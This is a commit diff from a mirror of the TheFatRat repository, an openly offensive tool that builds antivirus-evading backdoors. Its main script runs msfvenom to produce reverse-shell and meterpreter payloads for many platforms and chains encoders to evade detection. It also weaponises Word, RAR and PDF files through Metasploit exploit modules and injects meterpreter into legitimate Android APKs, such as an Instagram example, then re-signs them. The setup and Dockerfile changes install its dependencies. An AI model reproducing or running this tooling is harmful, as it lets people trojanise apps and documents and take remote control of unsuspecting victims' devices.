deviloric/TheFatRat
0
0
Fork 0
mirror of https://github.com/Screetsec/TheFatRat.git synced 2023-12-14 02:02:58 +01:00
Code Releases Activity

Merge pull request #53 from peterpt/master

Browse source 
version update 1.8.1
This commit is contained in:
Edo -maland- 2017-02-27 12:27:12 +07:00 committed by GitHub
commit 133e9049e2
9 changed files with 323 additions and 148 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
CHANGELOG.md
View file

@ -1,5 +1,9 @@
## CHANGELOG ## CHANGELOG
* v1.8.1 - added possibility to configure metasploit , backdoor-factory & searchsploit with manual inputs
* - added more packages instalations needed for non-pentest distribution & some bugs fixed
* v1.8 - add file pumper in TFR * v1.8 - add file pumper in TFR
* v1.8 - Backdoor with c program for meterpreter reverse_tcp * v1.8 - Backdoor with c program for meterpreter reverse_tcp
* v1.8 - Metasploit staging protocol ( c program ) * v1.8 - Metasploit staging protocol ( c program )

15
Dockerfile
View file

@ -17,7 +17,20 @@ RUN echo 'APT::Get::Install-Recommends "false";' >> /etc/apt/apt.conf \
backdoor-factory \ backdoor-factory \
monodevelop \ monodevelop \
ruby \ ruby \
apache2 apache2 \
upx-ucl \
xterm \
gnome-terminal \
default-jre \
default-jdk \
unzip \
aapt \
apktool \
dex2jar \
zlib1g-dev \
libmagickwand-dev \
imagemagick \
zipalign
WORKDIR /root/TheFatRat WORKDIR /root/TheFatRat
ADD . ./ ADD . ./

5
README.md
View file

@ -3,7 +3,7 @@
#TheFatRat ( Unit for bypass av ) #TheFatRat ( Unit for bypass av )
##Update: Version 1.8 ##Update: Version 1.8.1
##Codename: Spark ##Codename: Spark
What is TheFatRat ?? What is TheFatRat ??
@ -87,7 +87,8 @@ And it's up & running.
## :heavy_exclamation_mark: Requirements ## :heavy_exclamation_mark: Requirements
- A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling / Cyborg / Parrot / Dracos / BackTrack / Backbox / and another operating system ( linux ) - A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling
Cyborg / Parrot / Dracos / BackTrack / Backbox / Devuan and another operating system ( linux )
- Must install metasploit framework - Must install metasploit framework

4
config/readme.md Normal file
View file

@ -0,0 +1,4 @@
-----------------------------------------
|Folder for FatRat configuration files .|
| Do Not Remove this file . |
-----------------------------------------

157
fatrat
View file

@ -22,23 +22,22 @@ white='\e[1;37m'
red='\e[1;31m' red='\e[1;31m'
yellow='\e[1;33m' yellow='\e[1;33m'
BlueF='\e[1;34m' BlueF='\e[1;34m'
path=`pwd`
#Checking #Checking
[[ `id -u` -eq 0 ]] || { echo -e $red "Must be root to run script"; exit 1; } [[ `id -u` -eq 0 ]] || { echo -e $red "Must be root to run script"; exit 1; }
resize -s 33 84 > /dev/null resize -s 33 84 > /dev/null
clear clear
file="config.path" file="config/config.path"
if [ -f "$file" ] if [ -f "$file" ]
then then
msfconsole=`sed -n 5p config.path` msfconsole=`sed -n 5p $file`
msfvenom=`sed -n 6p config.path` msfvenom=`sed -n 6p $file`
backdoor=`sed -n 7p config.path` backdoor=`sed -n 7p $file`
searchsploit=`sed -n 8p config.path` searchsploit=`sed -n 8p $file`
else else
echo "Configuration file does not exists , run setup.sh first ." echo "Configuration file does not exists , run setup.sh first ."
exit 1 exit 1
fi fi
@ -113,7 +112,7 @@ cat << !
# Some Variables # Some Variables
##################### #####################
path=`pwd` path=`pwd`
Versi=1.8 Versi=1.8.1
codename=Sparta codename=Sparta
OS=`uname` # OS=`uname` #
distro=`awk '{print $1}' /etc/issue` distro=`awk '{print $1}' /etc/issue`
@ -135,7 +134,9 @@ out='output/ip.txt'
pump='tools/pump.py' pump='tools/pump.py'
reverse1='temp/reverse1.c' reverse1='temp/reverse1.c'
stag='temp/stag.c' stag='temp/stag.c'
apkconfig=$path/config/apk.tmp
unzip=unzip
temp=$path/temp
################################################### ###################################################
# CTRL C # CTRL C
################################################### ###################################################
@ -158,7 +159,7 @@ exit
######################### #########################
#CHECK DEPENDICS #CHECK DEPENDICIES
######################### #########################
echo -e $cyan" ____ _ _ _ " echo -e $cyan" ____ _ _ _ "
echo " / ___| |__ ___ ___| | _(_)_ __ __ _ " echo " / ___| |__ ___ ___| | _(_)_ __ __ _ "
@ -174,10 +175,10 @@ if [ $(id -u) != "0" ]; then
echo [!]::[Check Dependencies] ; echo [!]::[Check Dependencies] ;
sleep 2 sleep 2
echo [✔]::[Check User]: $USER ; echo [✔]::[Check User]: $USER ;
echo [✔]::[Distro]: $distro ; echo [✔]::[Distro]: $distro ;
sleep 1 sleep 1
echo [x]::[not root]: you need to be [root] to run this script.; echo [x]::[not root]: you need to be [root] to run this script.;
echo "" echo ""
sleep 1 sleep 1
exit exit
@ -187,8 +188,8 @@ else
echo [!]::[Check Dependencies]: ; echo [!]::[Check Dependencies]: ;
sleep 1 sleep 1
echo [✔]::[Distro]: $distro ; echo [✔]::[Distro]: $distro ;
echo [✔]::[Check User]: $USER ; echo [✔]::[Check User]: $USER ;
fi fi
@ -211,7 +212,7 @@ fi
# check apache if exists # check apache if exists
which apache2 > /dev/null 2>&1 which apache2 > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo [✔]::[Apache2 Server $distro ]: installation found!; echo [✔]::[Apache2 Server $distro ]: installation found!;
else else
echo [x]::[warning]:this script require apache2 to work ; echo [x]::[warning]:this script require apache2 to work ;
@ -251,12 +252,12 @@ sleep 2
# check if msfvenom exists # check if msfvenom exists
which $msfvenom > /dev/null 2>&1 which $msfvenom > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo [✔]::[Msfvenom]: installation found!; echo [✔]::[Msfvenom]: installation found!;
else else
echo [x]::[warning]:this script require msfvenom installed to work ; echo [x]::[warning]:this script require msfvenom installed to work ;
echo "" echo ""
echo [!]::Run setup.sh to install metasploit-framework ; echo [!]::Run setup.sh to install metasploit-framework ;
sleep 3 sleep 3
exit 1 exit 1
fi fi
@ -559,7 +560,7 @@ echo ""
spinlong spinlong
echo "" echo ""
echo "" echo ""
$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f elf > output/$fira.elf $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f elf > output/$fira.elf
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '2' elif test $fatrat1 == '2'
then then
@ -574,7 +575,7 @@ echo ""
spinlong spinlong
echo "" echo ""
echo "" echo ""
$msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | $msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | $msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| $msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | $msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o output/$fira.exe $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | $msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | $msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| $msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | $msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o output/$fira.exe
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '3' elif test $fatrat1 == '3'
then then
@ -589,7 +590,7 @@ echo ""
spinlong spinlong
echo "" echo ""
echo "" echo ""
$msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.apk $msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.apk
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '4' elif test $fatrat1 == '4'
then then
@ -604,7 +605,7 @@ echo ""
spinlong spinlong
echo "" echo ""
echo "" echo ""
$msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > output/$fira.macho $msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > output/$fira.macho
echo -e "Shell Saved To outputFolder " echo -e "Shell Saved To outputFolder "
elif test $fatrat1 == '5' elif test $fatrat1 == '5'
then then
@ -619,7 +620,7 @@ echo ""
spinlong2 spinlong2
echo "" echo ""
echo "" echo ""
$msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php $msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '6' elif test $fatrat1 == '6'
then then
@ -634,7 +635,7 @@ echo ""
spinlong2 spinlong2
echo "" echo ""
echo "" echo ""
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > output/$fira.asp $msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > output/$fira.asp
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '7' elif test $fatrat1 == '7'
then then
@ -649,7 +650,7 @@ echo ""
spinlong2 spinlong2
echo "" echo ""
echo "" echo ""
$msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > output/$fira.jsp $msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > output/$fira.jsp
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '8' elif test $fatrat1 == '8'
then then
@ -664,7 +665,7 @@ echo ""
spinlong2 spinlong2
echo "" echo ""
echo "" echo ""
$msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > output/$fira.war $msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > output/$fira.war
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '9' elif test $fatrat1 == '9'
then then
@ -679,7 +680,7 @@ echo ""
spinlong2 spinlong2
echo "" echo ""
echo "" echo ""
$msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > output/$fira.py $msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > output/$fira.py
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '10' elif test $fatrat1 == '10'
then then
@ -694,7 +695,7 @@ echo ""
spinlong2 spinlong2
echo "" echo ""
echo "" echo ""
$msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > output/$fira.sh $msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > output/$fira.sh
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '11' elif test $fatrat1 == '11'
then then
@ -709,7 +710,7 @@ echo ""
spinlong2 spinlong2
echo "" echo ""
echo "" echo ""
$msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > output/$fira.pl $msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > output/$fira.pl
echo -e "Shell Saved To output Folder " echo -e "Shell Saved To output Folder "
elif test $fatrat1 == '12' elif test $fatrat1 == '12'
@ -733,9 +734,9 @@ echo ""
gboor gboor
spinlong spinlong
echo "" echo ""
xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'" > /dev/null 2>&1 xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'"
echo "" echo ""
mv ~/.msf4/local/$fira.doc $path/output/$fira.doc mv ~/.msf4/local/$fira.doc $path/output/$fira.doc
echo -e $okegreen"" echo -e $okegreen""
echo -e $yellow" Backdoor doc Saved To output Folder " echo -e $yellow" Backdoor doc Saved To output Folder "
echo "" echo ""
@ -766,9 +767,9 @@ echo ""
gboor gboor
spinlong spinlong
echo "" echo ""
xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'" > /dev/null 2>&1 xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'"
echo "" echo ""
mv ~/.msf4/local/$fira $path/output/$fira mv ~/.msf4/local/$fira $path/output/$fira
echo -e $okegreen"" echo -e $okegreen""
echo -e $yellow" Backdoor Saved To output Folder " echo -e $yellow" Backdoor Saved To output Folder "
echo "" echo ""
@ -834,8 +835,8 @@ echo -e $okegreen" ============================================================
echo set LPORT $uservar >> "temp/meterpreter_linux.rc" echo set LPORT $uservar >> "temp/meterpreter_linux.rc"
echo set ExitOnSession false >> "temp/meterpreter_linux.rc" echo set ExitOnSession false >> "temp/meterpreter_linux.rc"
echo exploit -j >> "temp/meterpreter_linux.rc" echo exploit -j >> "temp/meterpreter_linux.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc" & xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc"
clear clear
elif test $fatrat1 == '2' #Windows elif test $fatrat1 == '2' #Windows
then then
rm temp/*.rc > /dev/null 2>&1 rm temp/*.rc > /dev/null 2>&1
@ -852,7 +853,7 @@ echo -e $okegreen" ============================================================
echo set AutoRunScript multi_console_command -rc $path/postexploit/$pe >> "temp/meterpreter_windows.rc" echo set AutoRunScript multi_console_command -rc $path/postexploit/$pe >> "temp/meterpreter_windows.rc"
echo set ExitOnSession false >> "temp/meterpreter_windows.rc" echo set ExitOnSession false >> "temp/meterpreter_windows.rc"
echo exploit -j >> "temp/meterpreter_windows.rc" echo exploit -j >> "temp/meterpreter_windows.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc" & xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc"
clear clear
elif test $fatrat1 == '3' #Mac elif test $fatrat1 == '3' #Mac
then then
@ -867,7 +868,7 @@ echo -e $okegreen" ============================================================
echo set LPORT $uservar >> "temp/meterpreter_mac.rc" echo set LPORT $uservar >> "temp/meterpreter_mac.rc"
echo set ExitOnSession false >> "temp/meterpreter_mac.rc" echo set ExitOnSession false >> "temp/meterpreter_mac.rc"
echo exploit -j >> "temp/meterpreter_mac.rc" echo exploit -j >> "temp/meterpreter_mac.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc" & xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc"
clear clear
elif test $fatrat1 == '4' #Android elif test $fatrat1 == '4' #Android
@ -884,7 +885,7 @@ echo -e $okegreen" ============================================================
echo set LPORT $uservar >> "temp/meterpreter_android.rc" echo set LPORT $uservar >> "temp/meterpreter_android.rc"
echo set ExitOnSession false >> "temp/meterpreter_android.rc" echo set ExitOnSession false >> "temp/meterpreter_android.rc"
echo exploit -j >> "temp/meterpreter_android.rc" echo exploit -j >> "temp/meterpreter_android.rc"
xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc" & xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc"
clear clear
elif test $fatrat1 == '5' elif test $fatrat1 == '5'
@ -927,7 +928,12 @@ echo -e $okegreen"[ ]$red Embed a Metasploit Payload in an original .
echo -e $okegreen"[ ]$red This script is POC for injecting metasploit payload arbitary apk backdoor $okegreen[ ]" echo -e $okegreen"[ ]$red This script is POC for injecting metasploit payload arbitary apk backdoor $okegreen[ ]"
echo -e $okegreen"[ ]$okegreen===========================================================================$okegreen[ ]" echo -e $okegreen"[ ]$okegreen===========================================================================$okegreen[ ]"
echo "" echo ""
echo "Cleaning Temp files"
rm -rf output/*
sleep 2
echo "Done!"
echo -e $okegreen"" echo -e $okegreen""
sleep 1
echo -ne " SET LHOST : ";tput sgr0 echo -ne " SET LHOST : ";tput sgr0
read yourip read yourip
echo "" echo ""
@ -936,7 +942,22 @@ read yourport
echo "" echo ""
echo -ne $okegreen "Located Original Apk file for embed (example:$path/PE/instagram.apk) :" ;tput sgr0 echo -ne $okegreen "Located Original Apk file for embed (example:$path/PE/instagram.apk) :" ;tput sgr0
read copyfile read copyfile
cp $copyfile $path/output/fatrat.apk cp $copyfile $path/output/fatrat.apk
apkt="$path/output/fatrat.apk"
if [ ! -f $apkt ]; then
echo "[!] There was an error copying your APK to a temporary folder , make sure you wrote the right path "
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
fi
$unzip -l $apkt > /dev/null 2>&1
rc=$?
if [ $rc != 0 ]; then
echo "[!] Original APK file specified is not valid"
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
fi
echo "" echo ""
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
echo "" echo ""
@ -946,16 +967,36 @@ spinlong
gboor2 gboor2
spinlong spinlong
echo "" echo ""
sleep 1
echo "Creating RAT payload with msfvenom"
$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $path/output/payload.apk
echo "Done !"
sleep 2
echo "Starting the merging process of RAT with the APK you selected"
echo "" echo ""
ruby $apkembed $path/output/fatrat.apk
echo "" echo ""
echo "" echo "Merge completed of Payload with your APK"
ruby $apkembed output/fatrat.apk -p $payload LHOST=$yourip LPORT=$yourport sleep 2
echo "" cp $path/output/fatrat_backdoored.apk $path/backdoored/apkembed.apk
cp $path/output/output/fatrat_backdoored.apk backdoored/apkembed.apk echo "File copied with success to : $path/backdoored"
rm -rf $path/output/* sleep 2
java -jar $bundle $cert $key $path/backdoored/apkembed.apk $path/output/Apk_embed_backdoor.apk echo "Removing temporary files from output"
rm backdoored/apkembed.apk sleep 2
echo -ne $okegreen" Your payload has been successfully embed with sign and is located here ( output folder ) " rm -rf $path/output/*
echo "Signing your APK file"
sleep 2
java -jar $bundle $cert $key $path/backdoored/apkembed.apk Apk_embed_backdoor.apk
rm $path/backdoored/apkembed.apk
mv $path/Apk_embed_backdoor.apk $path/backdoored/output/
outapk="$path/backdoored/output/Apk_embed_backdoor.apk"
if [ ! -f $outapk ]; then
echo "[!] APK Rat file was not found in : $path/backdoored/output/"
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
fi
echo -ne $okegreen" Your payload has been successfully embed with sign and is located here :
$path/backdoored/output/Apk_embed_backdoor.apk"
read loveyou read loveyou
echo echo
clear clear
@ -1031,7 +1072,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo
cat powershell_attack.txt cat powershell_attack.txt
sleep 2 sleep 2
rm unicorn.rc rm unicorn.rc
mv powershell_attack.txt output/$fira.bat mv powershell_attack.txt output/$fira.bat
echo "" echo ""
echo -e $okegreen"" echo -e $okegreen""
echo -e "Backdoor Saved To output Folder " echo -e "Backdoor Saved To output Folder "
@ -1199,7 +1240,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo
echo " Wait for embed exe to pdf .... " echo " Wait for embed exe to pdf .... "
xterm -T " TheFatRat < PDF BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use windows/fileformat/adobe_pdf_embedded_exe; set EXE::Custom $path/output/backdoor_for_pdf.exe; set FILENAME $fira.pdf; set INFILENAME $embedpdf; exploit; exit -y'" > /dev/null 2>&1 xterm -T " TheFatRat < PDF BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use windows/fileformat/adobe_pdf_embedded_exe; set EXE::Custom $path/output/backdoor_for_pdf.exe; set FILENAME $fira.pdf; set INFILENAME $embedpdf; exploit; exit -y'" > /dev/null 2>&1
echo "" echo ""
mv ~/.msf4/local/$fira.pdf $path/output/$fira.pdf mv ~/.msf4/local/$fira.pdf $path/output/$fira.pdf
rm unicorn.rc powershell_attack.txt rm unicorn.rc powershell_attack.txt
echo -e $okegreen"" echo -e $okegreen""
echo -e $yellow" Backdoor PDF Saved To output Folder " echo -e $yellow" Backdoor PDF Saved To output Folder "
@ -1506,7 +1547,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo
echo ' function();'>>$stag echo ' function();'>>$stag
echo ' return 0;'>>$stag echo ' return 0;'>>$stag
echo '}' >> $stag echo '}' >> $stag
$COMPILER $stag -o output/$fira.exe -lws2_32 $COMPILER $stag -o output/$fira.exe -lws2_32
echo echo
echo -e $yellow " [+]"$okegreen"Compiling Binary Done ";tput sgr0 echo -e $yellow " [+]"$okegreen"Compiling Binary Done ";tput sgr0
rm $stag rm $stag
@ -1916,7 +1957,7 @@ menu () {
elif test $fatrat == '2' elif test $fatrat == '2'
then then
chmod +x powerfull.sh chmod +x powerfull.sh
xterm -fa monaco -fs 13 -bg black ./powerfull.sh xterm -fa monaco -fs 13 -bg black ./powerfull.sh
elif test $fatrat == '3' elif test $fatrat == '3'
then then
@ -1936,7 +1977,7 @@ menu () {
spinlong2 spinlong2
echo "" echo ""
echo -e $okegreen"" echo -e $okegreen""
$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe
echo -e "Shell Saved To /backdoored/output/ press any key to continue" echo -e "Shell Saved To /backdoored/output/ press any key to continue"
read bebeku read bebeku
clear clear
@ -1956,7 +1997,7 @@ menu () {
elif test $fatrat == '8' elif test $fatrat == '8'
then then
xterm -fa monaco -fs 13 -bg black -e "$msfconsole" xterm -fa monaco -fs 13 -bg black -e "$msfconsole"
elif test $fatrat == '9' elif test $fatrat == '9'
then then
@ -2114,7 +2155,7 @@ echo
elif test $fatrat == '2' elif test $fatrat == '2'
then then
chmod +x powerfull.sh chmod +x powerfull.sh
xterm -fa monaco -fs 13 -bg black ./powerfull.sh xterm -fa monaco -fs 13 -bg black ./powerfull.sh
elif test $fatrat == '3' elif test $fatrat == '3'
then then
@ -2134,7 +2175,7 @@ echo
spinlong2 spinlong2
echo "" echo ""
echo -e $okegreen"" echo -e $okegreen""
$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe
echo -e "Shell Saved To /backdoored/output/ press any key to continue" echo -e "Shell Saved To /backdoored/output/ press any key to continue"
read bebeku read bebeku
clear clear
@ -2154,7 +2195,7 @@ echo
elif test $fatrat == '8' elif test $fatrat == '8'
then then
xterm -fa monaco -fs 13 -bg black -e "$msfconsole" xterm -fa monaco -fs 13 -bg black -e "$msfconsole"
elif test $fatrat == '9' elif test $fatrat == '9'
then then

3
logs/readme.md Normal file
View file

@ -0,0 +1,3 @@
*******************************************************************************
* All TheFatRat logs will be stored in this folder , do not delete this file! *
*******************************************************************************

10
powerfull.sh
View file

@ -1,11 +1,11 @@
#!/bin/bash #!/bin/bash
file="config.path" file="config/config.path"
if [ -f "$file" ] if [ -f "$file" ]
then then
msfconsole=`sed -n 5p config.path` msfconsole=`sed -n 5p $file`
msfvenom=`sed -n 6p config.path` msfvenom=`sed -n 6p $file`
backdoor=`sed -n 7p config.path` backdoor=`sed -n 7p $file`
searchsploit=`sed -n 8p config.path` searchsploit=`sed -n 8p $file`
else else
echo "Configuration file does not exists , run setup.sh first ." echo "Configuration file does not exists , run setup.sh first ."
exit 1 exit 1

242
setup.sh
View file

@ -8,11 +8,19 @@ sleep 4s
rm -f /etc/apt/sources.list rm -f /etc/apt/sources.list
mv /etc/apt/sources.list.fatrat /etc/apt/sources.list mv /etc/apt/sources.list.fatrat /etc/apt/sources.list
echo "Your Original repository list was recovered. ;) ..... beginning setup" echo "Your Original repository list was recovered. ;) ..... beginning setup"
echo ""
echo "Cleaning previous repositories cache & updating your repository ."
sudo apt-get clean && apt-get update -y
sleep 3s sleep 3s
else else
echo "" echo ""
fi fi
path=`pwd`
log=$path/logs/setup.log
config=$path/config/config.path
#Removing any previous setup log created
rm -f $log
# setup.sh Author : Edo maland ( Screetsec ) # setup.sh Author : Edo maland ( Screetsec )
# Install all dependencies nedded # Install all dependencies nedded
# configuration all file for fixing all problem # configuration all file for fixing all problem
@ -20,7 +28,7 @@ fi
#Check root dulu #Check root dulu
[[ `id -u` -eq 0 ]] || { echo -e "\e[31m Must be root to run script"; exit 1; } [[ `id -u` -eq 0 ]] || { echo -e "\e[31m Must be root to run script"; exit 1; }
resize -s 30 73 > /dev/null resize -s 30 73 > /dev/null 2>&1
clear clear
@ -48,11 +56,16 @@ echo " [ ] Use this script to configure fatrat [ ]"
echo " [ ] Install all dependencies [ ]" echo " [ ] Install all dependencies [ ]"
echo " [ ]=================================================[ ]"; echo " [ ]=================================================[ ]";
echo "" echo ""
touch $log
echo "------------------------------------------------------" >> $log
echo "| Tools paths configured in (setup.sh) for TheFatRat |" >> $log
echo "------------------------------------------------------" >> $log
echo " " >> $log
#check if xterm is installed #check if xterm is installed
which xterm > /dev/null 2>&1 which xterm > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Xterm.............................[ found ]" echo "[ ✔ ] Xterm.............................[ found ]"
which xterm >> $log 2>&1
sleep 2 sleep 2
else else
echo "" echo ""
@ -62,12 +75,14 @@ sleep 2
sudo apt-get install xterm -y sudo apt-get install xterm -y
clear clear
echo "[ ✔ ] Done installing .... " echo "[ ✔ ] Done installing .... "
which xterm >> $log 2>&1
fi fi
#check if zenity its installed #check if zenity its installed
which zenity > /dev/null 2>&1 which zenity > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Zenity............................[ found ]" echo "[ ✔ ] Zenity............................[ found ]"
which zenity >> $log 2>&1
sleep 2 sleep 2
else else
echo "" echo ""
@ -77,18 +92,21 @@ sleep 2
echo "[ ! ] Installing zenity from your apt sources ]" echo "[ ! ] Installing zenity from your apt sources ]"
xterm -T "☣ INSTALL ZENITY ☣" -geometry 100x30 -e "sudo apt-get install zenity -y" xterm -T "☣ INSTALL ZENITY ☣" -geometry 100x30 -e "sudo apt-get install zenity -y"
echo "[ ✔ ] Done installing .... " echo "[ ✔ ] Done installing .... "
which zenity >> $log 2>&1
fi fi
# check if gcc exists # check if gcc exists
which gcc > /dev/null 2>&1 which gcc > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Gcc compiler......................[ found ]" echo "[ ✔ ] Gcc compiler......................[ found ]"
which gcc >> $log 2>&1
sleep 2 sleep 2
else else
echo "[ X ] gcc compiler -> not found ]" echo "[ X ] gcc compiler -> not found ]"
echo "[ ! ] Installing gcc from your apt sources ]" echo "[ ! ] Installing gcc from your apt sources ]"
xterm -T "☣ INSTALL GCC COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install gcc -y" xterm -T "☣ INSTALL GCC COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install gcc -y"
echo "[ ✔ ] Done installing .... " echo "[ ✔ ] Done installing .... "
which gcc >> $log 2>&1
sleep 2 sleep 2
fi fi
@ -96,12 +114,14 @@ fi
which i586-mingw32msvc-gcc > /dev/null 2>&1 which i586-mingw32msvc-gcc > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Mingw32 Compiler..................[ found ]" echo "[ ✔ ] Mingw32 Compiler..................[ found ]"
which i586-mingw32msvc-gcc >> $log 2>&1
sleep 2 sleep 2
else else
echo "[ X ] mingw32 compiler -> not found ]" echo "[ X ] mingw32 compiler -> not found ]"
echo "[ ! ] Installing zenity from your apt sources ]" echo "[ ! ] Installing zenity from your apt sources ]"
xterm -T "☣ INSTALL MINGW32 COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install mingw32 -y" xterm -T "☣ INSTALL MINGW32 COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install mingw32 -y"
echo "[ ✔ ] Done installing .... " echo "[ ✔ ] Done installing .... "
which i586-mingw32msvc-gcc >> $log 2>&1
sleep 2 sleep 2
fi fi
@ -109,12 +129,14 @@ fi
which monodevelop > /dev/null 2>&1 which monodevelop > /dev/null 2>&1
if [ "$?" -eq "0" ]; then if [ "$?" -eq "0" ]; then
echo "[ ✔ ] Monodevelop ......................[ found ]" echo "[ ✔ ] Monodevelop ......................[ found ]"
which monodevelop >> $log 2>&1
sleep 2 sleep 2
else else
echo "[ X ] Monodevelop -> not found ]" echo "[ X ] Monodevelop -> not found ]"
